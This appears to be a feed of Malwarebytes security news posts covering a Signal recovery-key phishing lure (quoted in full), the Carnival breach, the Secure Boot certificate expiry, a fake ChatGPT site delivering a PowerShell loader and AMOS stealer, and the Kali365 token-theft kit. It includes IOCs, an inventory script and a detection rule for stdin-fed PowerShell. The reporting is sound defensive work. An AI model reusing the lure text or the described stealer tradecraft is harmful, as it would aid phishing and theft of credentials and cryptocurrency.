That’s what seemingly happened to a Persian poetry teacher from Detroit whose accounts were flagged for “sanctions violations” because his students wrote “Persian classes” in their Venmo memos. There’s also the story about the naked yoga practitioners who lost their payment processor for 60 days, forced to rebuild a subscriber list from scratch. And we can’t forget the San Diego cannabis journalist cut off from Stripe—and from a paid Substack newsletter—because of the payment platform’s rules that prohibit the promotion of the sale of cannabis.

This is “financial censorship,” and it often happens when a bank, credit card provider, or payment app decides that a customer is too risky to serve. But “risky” doesn’t always mean “illegal,” and when a major financial institution errs towards caution about what a customer is saying, advocating for, representing, or publishing, a lot of innocent people can be hurt in the process.

That’s what the digital rights activist Rainey Reitman learned in writing “Transaction Denied: Big Finance’s Power to Punish Speech.” As Reitman explained about these hugely impactful decisions:

“Even if they are well-intentioned, the financial systems can end up pulling in a lot of people that are not the actual target… Sometimes we talk about this as dolphins in the fishing lines.”

These decisions are difficult to fight, frustratingly opaque, and nearly impossible to reverse. Compounding the problem is that there aren’t enough alternatives available for the financially censored to easily regain their freedom.

The reality for hundreds of millions of people in this country is that about a dozen companies control all their finances. People mostly bank with Chase, or Bank of America, or Citigroup, or Wells Fargo. They mostly use credit cards assigned by Visa, MasterCard, American Express, or Capital One. And they mostly send money to one another and to small businesses using services like PayPal, Venmo, Cash App, and Square.

For most people, these companies are supposed to operate in the background of their lives, providing reliable, secure financing to sustain and manage their livelihoods. But in practice, these companies can become quite interested in what you say online, what payments you receive each month, and the locations those payments arrived from.

Today, on the Lock and Code podcast with host David Ruiz, we speak with Reitman—who is also the president and a co-founder of the Freedom of the Press Foundation—about the real stories of those who have been financially censored, why financial companies cut off customers for legal speech, and how a single company’s decision can create cascading consequences that feel impossible to fight.

“They’d be locked out of Venmo, then they’d be locked out of PayPal—which is connected to Venmo—and then they’d suddenly lose their Chase Bank account. You could see that in a lot of instances, losing one form of access to the financial system, it could result in a pattern where they would be losing access repeatedly.”

Tune in today to listen to the full conversation.

Show notes and credits:

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)

Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.

Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our exclusive offer for Malwarebytes Premium Security for Lock and Code listeners.

Categories: Malware Bytes

Signal users targeted in backup-stealing phishing attacks

Malware Bytes Security - Fri, 05/29/2026 - 8:07am

A new phishing campaign is targeting Signal users by attempting to steal their backup recovery keys to access encrypted message archives. 

The attack is initiated by a text message pretending to come from Signal Support.

“Action Required: Data Recovery Needed
Your Signal account data (message and media) Is at risk of permanent loss due to a sync issue.
To avoid losing your messages and media:
1. Go to Settings -> Backups -> Configure -> Enable backups -> View Recovery Key.
2. Copy the recovery key to your clipboard.
3. Paste the key into this chat.
This links your existing backup to your account. Failure to do this may result in losing access to your account and all stored data.”

There are a few red flags in this message:

  • The “Name not verified” label under the sender
  • Repeated threats of losing all your data
  • Pasting the key into the chat. Signal Support would never ask for your recovery key

The attack exploits Signal’s Secure Backups feature, which allows users to store encrypted archives of their conversations on Signal’s servers. These backups are protected by a 64-character recovery key.

That key should never leave the user’s device and is never shared with Signal’s servers. If hackers obtain this key and gain control of a victim’s account, they can download and decrypt the entire message history.

For an attacker, that’s even better than hijacking an account, which would only give them access to future messages.

For now, the attacks appear to be targeted. We have seen reports from journalists, reports of attacks on Chinese activists, and warnings from a researcher who investigates cyberattacks against journalists, dissidents, and human rights activists. But now that other cybercriminals are aware of this opportunity, the tactic could spread rapidly.

How to stay safe

Signal explicitly states that it will never reach out to users first and will never request registration codes, PINs, or recovery keys. 

  • Treat unsolicited messages from “Support” as suspicious by default. Legitimate support for apps like Signal and WhatsApp does not ask you, in a chat message, to send back verification codes, PINs, or passwords. If you receive a warning about account problems, do not follow links in the message. Open the app’s settings directly or visit the official website through other means.
  • Never share any secret codes, multi-factor authentication keys, or app PINs. SMS codes are there to prove that you control a phone number. Anyone who has the code can pretend to be you. App‑specific PINs or passcodes are there to protect account changes. Consider anyone asking for them to be a scammer.
  • Use the extra security features these apps offer. Enable options like registration lock, registration PIN and device‑change alerts so that your account cannot be silently re‑registered without an extra secret. Store your PIN in a password manager instead of choosing something easy to guess or reusing a code. This reduces the risk of social engineering or shoulder‑surfing.
  • Another useful feature is disappearing messages. Short-timer and disappearing messages reduce how much content is available if an attacker gains access to a chat later, or obtains long-term access to a device or backup. They are not a complete solution, but they can limit the damage.
  • Use Malwarebytes Scam Guard on your device or online to check messages. Malwarebytes Scam Guard identified this message as a phishing attempt and provided further information about how to proceed.


Categories: Malware Bytes

Carnival confirms data breach impacting nearly 6 million

Malware Bytes Security - Thu, 05/28/2026 - 8:04am

Carnival Corporation, parent of Carnival Cruise Line, is sending out fresh “Notice of Cybersecurity Event” letters dated May 27, 2026. If you feel like you’ve read that sentence before, you’re not imagining things. Over the last decade, the world’s largest cruise operator has accumulated a worrying track record of breaches, ransomware incidents, and regulatory penalties, with this 2026 incident adding yet another entry to an already lengthy cybersecurity history.

There are several data breaches involving Carnival Corporation or one of its subsidiaries in our database.

Between 2019 and 2021 alone, Carnival reported four separate cybersecurity events to the New York Department of Financial Services. These included two ransomware attacks and a phishing incident in which attackers deployed malware, accessed and encrypted internal systems, and stole personal customer and employee information.

In this latest case, an attacker used social engineering to trick a Carnival employee into granting access to part of the company’s IT systems on April 14, 2026. By April 22, they used a compromised account to access a “limited portion” of Carnival’s IT systems, where they were able to copy personal data before being blocked.

According to the data breach notice filed in Maine, a total of 5,995,277 people were affected. Carnival determined that the intruder had illegally copied files containing personal information and is now writing to affected individuals to tell them that “data elements” relating to them were obtained.

Researchers cited by Gblock say the stolen data appears to include:

  • Full names
  • Email addresses
  • Dates of birth
  • Genders
  • Mariner Society membership status and tier
  • Internal customer identifiers

The template letter does not list specific data fields. Instead, it uses a placeholder:

“We have determined that your <<data elements>> were obtained.”

This strongly suggests that Carnival is populating each letter with data categories relevant to that particular individual, a common pattern in large breaches where people may have provided different information at different times.

Furthermore, the letters contain the usual content about the speed with which the company acted, involving third‑party experts, and frame the affected systems as a limited subset of the environment. For recipients, the important fact is not how limited the breach was from the company’s point of view, but whether the exposed information could be used for identity theft, fraud, or highly convincing phishing attacks.


We do know from past Carnival incidents that exposed data has included names, addresses, dates of birth, passport numbers, health information, and payment details. In previous breaches affecting cruise lines, compromised data has ranged from basic contact details to Social Security numbers and credit card information. Carnival has not publicly disclosed the full categories of data involved in the 2026 incident, but given that this 2026 event again involves “personal information” copied from internal systems, it is reasonable to treat it as a serious privacy incident, even if the exact mix of data varies per person.

The attack was claimed by extortion group ShinyHunters, which is known to steal data and then ask for a ransom. If the victim does not agree to the terms, the data will be published and/or sold to the highest bidder.

ShinyHunters offers Carnival data for download

From a cybercriminal’s perspective, cruise industry data is highly prized. Cruise passengers are often relatively wealthy, and passenger records can combine identity data (names, addresses, dates of birth, passport numbers), contact data (emails, phone numbers), and potentially payment data (card numbers and sometimes bank details), making them valuable for identity theft, targeted phishing, and fraud.

What to do if you’re affected

To mitigate the fallout, Carnival is offering a complimentary 24‑month TransUnion credit‑monitoring package, delivered via the MyTrueIdentity platform and supported by Cyberscout for fraud assistance.

Be cautious of emails, texts, or calls claiming to come from Carnival or credit-monitoring providers, as cybercriminals often exploit breaches with phishing scams. Read our advice on what to do when you find out you’re involved in a data breach.


Your Windows PC has a security deadline in June 2026

Malware Bytes Security - Thu, 05/28/2026 - 7:03am

A Secure Boot certificate refresh is rolling out across supported Windows devices through Windows Update. In June 2026, the Secure Boot certificates that have shipped inside Windows since 2011 begin to expire, and Microsoft is replacing them with new 2023-dated certificates.

The good news: If you keep your PC updated, you probably won’t need to do anything. The bad news: Some older devices may not transition cleanly. Your PC won’t suddenly stop working, but over time it could miss important boot-level security protections without you realizing it.

Here’s what’s going on, why it matters, and how to check that your machine is on the right side of the deadline.

What is Secure Boot, and what’s expiring?

Secure Boot is a UEFI firmware feature built into virtually every PC sold since around 2012. It runs before Windows even starts loading, and its job is to verify that the boot loader and early boot components have been signed by a trusted party. If something tries to insert itself into the boot chain that isn’t on the trust list—a bootkit, for example—Secure Boot refuses to let it run.

The “trusted party” part is the crucial bit. Trust is established through cryptographic certificates baked into your motherboard firmware. The current certificates were issued in 2011 and are now reaching expiration. Three specific certificates are involved:

  • Microsoft Corporation KEK CA 2011: expires June 24, 2026
  • Microsoft UEFI CA 2011: expires June 27, 2026
  • Microsoft Windows Production PCA 2011: expires October 19, 2026

Microsoft is replacing them with a 2023-dated set, including Windows UEFI CA 2023 and Microsoft Corporation KEK 2K CA 2023. According to Microsoft engineers speaking during a March 2026 AMA session, the new certificates are valid until 2038, and a separate post-quantum cryptography transition is planned for around 2030 for future hardware.

“Will my computer stop working?”

No. This is the single most important thing to understand, because the rumor mill has been louder than the facts.

If the deadline arrives and your PC is still running on the 2011 certificates, Windows will still boot, Windows Update will still work, and your PC will continue functioning normally.

What changes is that, in Microsoft’s own words, the device “will no longer be able to receive new security protections” for the early boot process, including updates to Windows Boot Manager, Secure Boot databases, revocation lists, and mitigations for newly discovered boot-level vulnerabilities.

In plain English: Your PC becomes harder to protect over time. It’s protected against today’s known boot threats, but not necessarily against the ones that will be discovered next month or next year.

That’s a problem because bootkits operate underneath Windows and antivirus software. They run before anything else and can disable the security tools that would normally catch them.

The BlackLotus problem

If you want a concrete example of why boot-level security matters, look at BlackLotus.

BlackLotus is a UEFI bootkit that emerged on hacking forums in 2022 and was confirmed in the wild by researchers in early 2023. It exploited CVE-2022-21894, nicknamed “Baton Drop,” to bypass Secure Boot on fully patched Windows systems. Once installed, it could disable BitLocker, Hypervisor-Protected Code Integrity (HVCI), and Microsoft Defender before Windows fully loaded.

Microsoft addressed the underlying flaw in CVE-2023-24932, but fixing vulnerable boot managers safely is complicated. Revoking the wrong boot components can leave systems unbootable, which is why Microsoft has rolled out protections gradually over several years.

The 2026 certificate rollover is a planned lifecycle event (the 2011 certificates were always going to expire), but it also enables the broader Secure Boot hardening Microsoft has been doing in response to vulnerable boot managers and attacks such as BlackLotus.

With the new trust anchors in place, Microsoft can continue rolling out newer 2023-signed boot components and safely revoke vulnerable ones as new threats emerge. Devices that don’t make the transition may eventually miss those future protections.

How the rollout works

Microsoft is using a staged rollout designed to avoid breaking systems.

A scheduled Windows task runs roughly every 12 hours and applies the update in stages:

  1. Add the new Windows UEFI CA 2023 to the firmware’s signature database.
  2. If the old 2011 third-party certificate is still present, add the Microsoft UEFI CA 2023 and Microsoft Option ROM UEFI CA 2023 alongside it.
  3. Add the new Microsoft Corporation KEK 2K CA 2023 key.
  4. Update the Windows Boot Manager to one signed by the new certificate. This step is deferred until the next natural reboot.

Microsoft’s IT pro guidance estimates the full process takes roughly 48 hours and one or more restarts to complete. Each step must succeed before the next one runs, so a device can sit partway through the sequence for a while if (for example) it’s waiting on a firmware update or a scheduled reboot.

For most home users, this happens silently in the background through normal cumulative updates.

Starting with the April 2026 Windows update, the Windows Security app includes updated Secure Boot status information under Device security that shows whether the new certificates have been applied successfully.

What could go wrong

Most systems will transition without problems, but there are some known trouble spots:

  • Older PCs with outdated firmware. Some older UEFI firmware implementations don’t properly support the new certificates. These systems may require a BIOS or firmware update from the manufacturer before the transition can complete.
  • PCs that bypassed Windows 11 requirements. If Secure Boot was disabled to install Windows 11 using unofficial workarounds, the new certificates cannot be applied correctly.
  • Legacy BIOS / CSM systems. Devices running Legacy BIOS (or UEFI with Compatibility Support Module enabled) aren’t using Secure Boot at all, so they’re outside the scope of this update entirely.
  • Custom firmware and weird configurations. Some custom or unusual firmware configurations may trigger a BitLocker recovery prompt after the Secure Boot variables change. Microsoft has been careful to note that BitLocker itself is not being disabled, but users should have their recovery keys handy just in case.

Windows Latest reported seeing update failures on thousands of PCs with outdated firmware during testing. Microsoft’s own guidance more broadly warns that firmware, platform, and OEM limitations can block the transition. In many cases, Windows Security will flag affected systems with yellow or red status warnings.

What home users should do

For most people, the advice is straightforward:

  • Keep Windows fully up to date. Microsoft is rolling the new certificates out through normal Windows updates, and most home users won’t need to do anything beyond installing monthly updates.
  • Check your Secure Boot status (the text, not just the color). Open Windows Security > Device security > Secure Boot. A green badge with the text “Secure Boot is on, preventing malicious software from loading when your device starts up.” is the all-clear. Microsoft warns that a green checkmark alone doesn’t confirm the new certificates have been applied.
  • If your device is older, check for a BIOS/firmware update from your manufacturer. Some systems need them before the Secure Boot update can complete properly. This is especially important for PCs built before 2024.
  • Don’t disable Secure Boot to “fix” something. Disabling Secure Boot is exactly the wrong response—it removes the protection entirely rather than updating it. Some game anti-cheat systems and older apps ask users to do this.
  • Don’t panic about the new SecureBoot folder. Windows 11’s May 2026 cumulative update (KB5089549) creates a folder at C:\Windows\SecureBoot containing example PowerShell scripts intended for IT administrators. It’s not malware, it’s expected, and you don’t need to delete it.
  • Use up-to-date, real-time anti-malware protection that can detect threats at the OS level even if something does slip past Secure Boot.

What IT teams should do

If you manage a fleet, Microsoft has published extensive guidance and the work is more involved. The short version:

  • Inventory your devices now. Pull the manufacturer, model, BIOS version and date, baseboard product, and Secure Boot status across the fleet. Microsoft provides a PowerShell sample script at aka.ms/GetSecureBoot that surfaces the relevant registry keys and event IDs.
  • Watch Event IDs 1801 and 1808. Event ID 1808 confirms the new certificates are in place. Event ID 1801 means the device has not completed the update.
  • Test before broad rollout. Microsoft recommends testing at least four devices per unique manufacturer/model/firmware combination. Some systems may need an OEM firmware update before they can accept the new certificates.
  • Choose one deployment method per device. Use registry keys, Group Policy, WinCS command-line tools, or Intune/ConfigMgr scripts, but don’t mix methods on the same machine.
  • Pay attention to PXE imaging and Hyper-V. SCCM/MECM PXE servers may need a re-signed boot.wim, and Hyper-V hosts may need updating before new VMs are created with the 2023 KEK in the firmware template.
  • Document devices that can’t be updated. Older hardware without OEM firmware support may need to be replaced before the deadline or formally accepted as an exception with compensating controls. These devices will keep working, but they may miss future boot-level protections.
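
An added example, not the article’s and not Microsoft’s aka.ms/GetSecureBoot script: one PowerShell function that gathers the inventory fields listed above, checks the firmware db and KEK variables for the 2023 CAs (rollout steps 1 and 3), and reads the 1801/1808 events. It assumes those events land in the System log and must run elevated.

```powershell
#Requires -RunAsAdministrator
# Added example (not Microsoft's sample script): report one device's position in
# the 2023 Secure Boot certificate rollover. Assumption: event IDs 1801/1808 are
# written to the System event log.

function Get-SecureBootRolloverStatus {
    [CmdletBinding()]
    param()

    # Hardware identity: the fields the fleet inventory should capture
    $cs    = Get-CimInstance -ClassName Win32_ComputerSystem
    $bios  = Get-CimInstance -ClassName Win32_BIOS
    $board = Get-CimInstance -ClassName Win32_BaseBoard

    # Confirm-SecureBootUEFI throws on Legacy BIOS / CSM machines, which are out of scope
    $secureBootOn = $null
    try { $secureBootOn = Confirm-SecureBootUEFI } catch { $secureBootOn = $null }

    # The db and KEK variables hold DER certificates; the CA subject names are
    # readable as ASCII, so a substring match tells whether the 2023 CAs were added.
    $dbHas2023  = $false
    $kekHas2023 = $false
    if ($secureBootOn) {
        $db  = [System.Text.Encoding]::ASCII.GetString((Get-SecureBootUEFI -Name db).Bytes)
        $kek = [System.Text.Encoding]::ASCII.GetString((Get-SecureBootUEFI -Name kek).Bytes)
        $dbHas2023  = [bool]($db  -match 'Windows UEFI CA 2023')                 # rollout step 1
        $kekHas2023 = [bool]($kek -match 'Microsoft Corporation KEK 2K CA 2023') # rollout step 3
    }

    # 1808 = new certificates in place, 1801 = update not completed (Get-WinEvent
    # errors when nothing matches, hence SilentlyContinue)
    $events = Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 1801, 1808 } `
                           -MaxEvents 20 -ErrorAction SilentlyContinue
    $latest = $events | Sort-Object TimeCreated -Descending | Select-Object -First 1

    $verdict = if ($null -eq $secureBootOn)        { 'OutOfScope-LegacyBIOS' }
               elseif (-not $secureBootOn)         { 'SecureBootDisabled' }
               elseif ($dbHas2023 -and $kekHas2023) { 'Transitioned' }
               else                                 { 'Pending-CheckFirmware' }

    [pscustomobject]@{
        ComputerName  = $env:COMPUTERNAME
        Manufacturer  = $cs.Manufacturer
        Model         = $cs.Model
        BiosVersion   = $bios.SMBIOSBIOSVersion
        BiosDate      = $bios.ReleaseDate
        Baseboard     = $board.Product
        SecureBootOn  = $secureBootOn   # $null means not a UEFI/Secure Boot system
        DbHasCA2023   = $dbHas2023
        KekHas2K2023  = $kekHas2023
        LastEventId   = $latest.Id      # 1808 good, 1801 incomplete, empty if none logged
        LastEventTime = $latest.TimeCreated
        Verdict       = $verdict
    }
}

Get-SecureBootRolloverStatus | Format-List
```

A device that reports Transitioned but whose last event is 1801 is still mid-sequence (typically waiting on the boot manager step and a reboot), so treat the event as the final word.
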

The bottom line

This is one of those security events that won’t generate a dramatic incident on June 24, 2026. Nothing visible will break that day.

The risk is what happens in the months and years after. Devices that fail to transition to the new trust chain may slowly fall behind on future boot-level protections as Microsoft continues responding to threats like BlackLotus and other bootkits.

For most home users, Windows Update will handle the transition automatically. Your main job is to keep your system updated and verify Secure Boot status before the deadlines arrive.

If your hardware is older, now is a good time to check whether your manufacturer still provides firmware updates—and whether your PC is ready for the next decade of Secure Boot protections.


Fake ChatGPT download site infects Windows and Mac users with malware

Malware Bytes Security - Thu, 05/28/2026 - 6:18am

A convincing fake website is impersonating OpenAI’s ChatGPT download page and infecting visitors with malware designed to steal passwords, browser data, cryptocurrency wallets, and other sensitive information.

The site, openew[.]app, closely mimics OpenAI’s real ChatGPT download experience and offers what appear to be official desktop apps for both Windows and macOS. Instead, Windows users receive a credential-stealing malware loader, while Mac users get Atomic Stealer (AMOS), a well-known macOS malware family associated with cryptocurrency theft.

The dual-platform setup is what makes the operation notable. Clicking the Windows download delivers a fake installer that opens a back channel to an attacker-controlled server. Clicking the macOS button delivers malware that steals browser passwords, cookies, Telegram sessions, cryptocurrency wallets, and other sensitive files. It also attempts to replace legitimate Ledger and Trezor wallet apps with trojanized versions.

If you only download ChatGPT from OpenAI’s official download page or the Microsoft Store, you were not the target here. But if you searched for “ChatGPT download” and clicked an ad or unfamiliar result, you may have given attackers access to your online accounts, browser sessions, saved passwords, and potentially your cryptocurrency holdings.

Technical analysis

The domain, openew[.]app, closely resembles OpenAI’s real ChatGPT download experience. It uses a dark theme, OpenAI-style branding, familiar marketing copy, and prominent download buttons for macOS and Windows.

The .app top-level domain is operated by Google and requires HTTPS connections, meaning browsers display the familiar padlock icon without obvious certificate warnings.

The most important detail is the dual-platform setup. Real software vendors provide separate installers for Windows and macOS, and this fake site does exactly the same thing.

Clicking the Windows button delivers Chat_GPT.exe, while clicking the macOS button downloads a disk image containing ChatGpt.dmg.

The Windows malware

Chat_GPT.exe is built almost entirely from off-the-shelf parts. The installer uses Inno Setup, a free open-source toolkit used by thousands of legitimate Windows products. Inside is an Electron application skeleton—the same Chromium-based framework used by apps like Slack and Discord—bundled with standard support libraries publicly available from the Electron project.

When the victim runs the installer, it creates files under %APPDATA%\LeronApplication, launches EApp.exe, and spawns PowerShell with the flags -ExecutionPolicy Unrestricted -Command -. The trailing dash tells PowerShell to read commands from standard input, meaning the malicious instructions never touch the disk where scanners might detect them. Behavioral telemetry recorded HTTP traffic to 188.137.246.189 using a /laravel.php?api=api&hash=...&message=... endpoint, alongside injection-like activity and service/autorun persistence signals. Nine of 69 antivirus engines flagged the file as malicious at the time of analysis. The persistence evidence is better read as behavioral tradecraft than proof of a durable install, but the overall pattern is familiar commodity stealer/dropper territory: cheap, modular, and effective rather than technically novel.
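
An added example, not part of the Malwarebytes analysis: a PowerShell check over constructed process-creation records (Sysmon Event ID 1 field names assumed) that scores the launch pattern above: PowerShell told to read its script from standard input with a relaxed execution policy, spawned from a user-writable AppData path.

```powershell
# Added example (not from the Malwarebytes analysis): score process-creation
# records for the stdin-fed PowerShell launch described above. Records are
# constructed; field names mimic Sysmon Event ID 1 (Image, CommandLine, ParentImage).

$events = @(
    [pscustomobject]@{ Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       CommandLine = 'powershell.exe -ExecutionPolicy Unrestricted -Command -'
                       ParentImage = 'C:\Users\alice\AppData\Roaming\LeronApplication\EApp.exe' }
    [pscustomobject]@{ Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       CommandLine = 'powershell.exe -NoProfile -File C:\Scripts\nightly-backup.ps1'
                       ParentImage = 'C:\Windows\System32\svchost.exe' }
    [pscustomobject]@{ Image       = 'C:\Program Files\PowerShell\7\pwsh.exe'
                       CommandLine = 'pwsh -ep bypass -c -'
                       ParentImage = 'C:\Users\bob\AppData\Local\Temp\setup.exe' }
)

function Test-StdinPowerShellLaunch {
    param([Parameter(Mandatory)][object]$Record)

    # Only PowerShell hosts are interesting here
    if ($Record.Image -notmatch '(?i)\\(powershell|pwsh)\.exe$') { return $null }

    $cl = $Record.CommandLine
    $reasons = @()
    # "-Command -" (or "-c -"): the script body arrives on stdin, so nothing is written to disk
    if ($cl -match '(?i)(^|\s)-c(ommand)?\s+-\s*$') {
        $reasons += 'script read from stdin (-Command -)'
    }
    # Execution policy relaxed on the command line
    if ($cl -match '(?i)(^|\s)-e(p|xecutionpolicy)?\s+(unrestricted|bypass)\b') {
        $reasons += 'execution policy relaxed'
    }
    # Parent living under a per-user writable path, as EApp.exe does under %APPDATA%
    if ($Record.ParentImage -match '(?i)\\AppData\\') {
        $reasons += 'parent runs from AppData'
    }

    if ($reasons.Count -eq 0) { return $null }
    [pscustomobject]@{
        Parent      = $Record.ParentImage
        CommandLine = $cl
        Score       = $reasons.Count       # 3 = all indicators present
        Reasons     = ($reasons -join '; ')
    }
}

# The first and third records score 3; the scheduled backup scores nothing
$events | ForEach-Object { Test-StdinPowerShellLaunch -Record $_ } |
    Where-Object { $_.Score -ge 2 } |
    Format-Table -AutoSize
```
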

CAPTCHA displayed after the fake app launches, used to confirm that a real user is running it.

The macOS malware: Atomic Stealer (AMOS)

The macOS payload sits at the premium end of the commodity-malware market. It’s Atomic Stealer, also known as AMOS, a malware-as-a-service platform documented since 2023, including in our 2024 coverage of an updated version.

The identification is fairly clear-cut. The sandboxed sample matches well-known AMOS behavior patterns: a long AppleScript chain passed to the macOS scripting engine, a silent password validation attempt using macOS directory-service commands, and—if that silent check fails—a fake macOS-style prompt reading “Please enter device password to continue,” complete with the familiar lock icon. Whatever the user types is validated against the same command. If it matches, the malware captures the user’s login password in cleartext.

From there, it follows a familiar AMOS playbook. It copies the macOS keychain, harvests cookies and saved logins from 12 Chromium-based browsers plus Firefox and Waterfox, and extracts Telegram session data. It also scans 16 cryptocurrency wallet directories, including Ledger Live, Trezor Suite, Exodus, Electrum, and Sparrow. Finally, it searches Desktop and Documents folders for files with extensions like .wallet, .seed, .key, and .kdbx. The collected data is compressed into a temporary archive and sent to a hardcoded server.

The wallet replacement feature is especially dangerous

There’s one more part of the macOS payload, and it’s likely the feature that justifies the price tag. After the initial data theft, the script downloads trojanized versions of Ledger Live, Ledger Wallet, and Trezor Suite from a second server. It then attempts to delete the legitimate wallet apps and replace them with the attacker’s versions.

If the user’s password was captured earlier in the attack chain, the script uses sudo to force the replacement. If not, it falls back to a standard rm -rf deletion attempt, which can still succeed if the apps are installed in a user-writable location. Either way, the next time the victim opens what appears to be their wallet software, they may actually be launching the attacker’s replacement.

This behavior has been documented in previous public AMOS analyses and makes the operator’s intent fairly clear. AMOS is heavily associated with cryptocurrency theft, and the macOS side of this campaign appears focused on exactly that outcome.

What the operation cost to build

This is where the AI angle becomes interesting, because the Windows and macOS sides of the operation sit at very different price points.

The domain openew[.]app probably cost the operators around $15 a year through a normal registrar. The .app domain requires HTTPS by default, making it easy for operators to present the reassuring browser padlock users associate with legitimate websites. The landing page itself is simply a copy of OpenAI’s real download page, something modern cloning tools can reproduce in minutes.

On the Windows side, most of the tools are cheap or free. Inno Setup is free. Electron is free. The Chromium support files are public downloads. The server infrastructure appears to rely on low-cost commodity malware tooling and a basic VPS that could cost only a few dollars a month. Altogether, the Windows side of this operation could plausibly have cost under $100 to set up initially.

The macOS side is very different. AMOS has reportedly rented for around $3,000 per month, paid in cryptocurrency. By comparison, Lumma—a popular Windows infostealer often treated as a similar product—has historically advertised entry tiers around $250 per month.

That price gap says a lot. The operators clearly believe a successful Mac infection is worth much more money than a typical Windows infection.

The likely reason is simple: AMOS is designed specifically for cryptocurrency theft, including the wallet-replacement behavior seen in this campaign. The operators are betting that a meaningful number of Mac users hold cryptocurrency.

Getting victims to the site is probably the only major ongoing cost, and that’s where the AI branding becomes valuable. Search ads, SEO poisoning, YouTube spam, and links shared in AI-focused Discord and Telegram communities can all drive traffic to fake download pages. Some of those channels cost money. Others are almost free.

Why attackers are going after AI brands

Most established software already has trusted download habits built around it. If you want Chrome, you probably know to go to Google. If you want Photoshop, you go to Adobe. People already know where the real download lives.

AI tools are different because most users are still installing them for the first time, and that means relying on search results, ads, YouTube links, or social posts to find the download page. That creates an ideal environment for fake sites.

Over the last two years, products like ChatGPT, Claude, Gemini, Sora, DeepSeek, Antigravity, and many others have launched or changed rapidly. Every new release creates another wave of users searching for “download ChatGPT” or “install Claude” without knowing the official URL. That search traffic is exactly where attackers set up shop.

The fake pages also do not need to be especially sophisticated because legitimate AI product pages are already minimal by design: a modern layout, a logo, and a large download button. Openew[.]app matches what users expect to see. There is no broken English or aggressive pop-ups here, just identical branding, copy, and the reassuring browser padlock.

What makes this kind of operation durable is how easily it can rotate brands. When the ChatGPT lure stops attracting clicks, the operators can reuse the same infrastructure around the next trending AI product. The malware behind the download button stays the same. Only the branding changes.

What AI vendors could do

Most major AI vendors, including OpenAI, already provide official download channels. The problem is visibility and user habit. Many users still search for “ChatGPT download,” where results can include official links, unofficial mirrors, and outright malicious sites.

Large consumer brands and banks often run aggressive brand-protection campaigns against fake ads and impersonation domains. AI vendors may need to do the same more consistently.

The other issue is discoverability. Official desktop-app links are often buried in settings menus or sidebars, while search engines are faster and more obvious. That’s exactly where the fake download sites are waiting.

What to do if you may have installed the fake app

If you recently installed something claiming to be ChatGPT from anywhere other than OpenAI’s official download page or the Microsoft Store, you may have been affected. From a different, clean device:

  • Sign out of your important accounts using each service’s “sign out everywhere” option. This includes email, banking, cloud storage, GitHub, Discord, Telegram, and cryptocurrency exchanges.
  • Change passwords starting with your primary email account.
  • Rotate any API keys, SSH keys, and cloud credentials stored on the affected machine.
  • If you hold cryptocurrency, move funds immediately using a separate clean device. On macOS specifically, do not open Ledger Live or Trezor Suite on the affected machine before reinstalling the operating system, as the wallet-replacement function may have succeeded.
  • Monitor bank accounts and payment cards for suspicious activity.
  • Reinstall the operating system. The Windows sample showed PowerShell command-and-control behavior, while the macOS payload may have captured the user’s login password. A clean reinstall is the safest recovery path.
  • If this was a work device, contact your IT or security team immediately.

Closing thoughts

The reason this campaign is worth writing about is not the malware itself. Both payloads are already well documented. The Windows side is a commodity kit assembled from cheap, widely available parts. The macOS side is AMOS, a malware family that has been tracked since 2023.

What’s more interesting is the shape of the operation around that malware. A single fake site delivers two different payloads aimed at two different victim economics. Windows victims are positioned for broad monetization through credential and cookie theft. Mac victims are targeted more narrowly and lucratively through cryptocurrency theft, with operators apparently willing to spend thousands per month on tooling because the returns justify it.

The lure tying both sides together is the AI brand itself. Right now, AI product names generate huge amounts of first-time-download traffic from users who do not yet know the official URLs.

This is what a mature delivery business looks like. The interesting layer is not the binary, but the supply chain around it: the domain, certificate, clone page, traffic source, malware subscription, and exfiltration infrastructure. Each piece is cheap, modular, replaceable, and available off the shelf.

And the operators are not choosing between Windows and macOS. They are serving both from the same page, with payloads tuned to each platform’s economics. When one AI brand stops converting, they can simply swap the branding and reuse the same infrastructure around the next trending product.

AI hype will eventually fade. The kit probably will not.

Indicators of Compromise (IOCs)

File hashes (SHA-256)

  • c9e0e6985dca3a179c9bdea4e7b38f7dc57fe00ecedc2fd634256fc53bf2de2d (Chat_GPT.exe)
  • c0919e1999eaee67e67aeda0287722775afb04e9a9a0f727928b4d11265fb70b (ChatGpt.dmg)

Network indicators

  • openew[.]app
  • 188[.]137[.]246[.]189
  • 192[.]253[.]248[.]181
  • 172[.]94[.]9[.]250

Kali365 phishing kit bypasses MFA and steals Microsoft logins

Malware Bytes Security - Wed, 05/27/2026 - 7:41am

When the Federal Bureau of Investigation (FBI) publishes a dedicated public service announcement about a new phishing kit, it’s worth paying attention to.

The agency is now warning about “Kali365,” a phishing‑as‑a‑service (PhaaS) platform that helps even low‑skilled attackers hijack Microsoft 365 accounts by stealing access tokens instead of passwords.

Although early reporting focuses on attacks against organizations, the underlying technique works just as easily against individual Microsoft 365 users who are tricked into entering a short code on a real Microsoft website. In other words, this is not just a business or IT department problem. It could affect anyone with an Outlook, OneDrive, or Microsoft 365 subscription.

For cybercriminals using the kit, it offers three clear advantages:

  • It bypasses multi‑factor authentication (MFA) by stealing access tokens, so extra codes or apps no longer help once the token is compromised.
  • Kali365 provides ongoing access. The attackers can keep using Outlook, Teams, and OneDrive without repeatedly logging in, as long as the stolen refresh token remains valid.
  • Little technical skill needed. Cybercriminals can subscribe to Kali365 and immediately run token‑stealing campaigns at scale.

What does the attack look like?

Victims receive a phishing message that looks like it comes from a cloud service or collaboration tool, such as a document‑sharing notification or Teams invite. The message includes a short “device code” and instructions like: “Go to Microsoft’s verification page and enter this code to view the document.”


Unlike many phishing emails, this one sends you to a real Microsoft URL used for device sign‑in flows. To the user, the page looks familiar and completely legitimate, which lowers suspicion.

Victims then see the standard Microsoft sign‑in and consent screens and may think they are simply completing a normal security check. They never see a fake page, never type their password into a suspicious form, and may even see their organization’s branding.

But what they don’t realize is that they have handed access to the attacker.

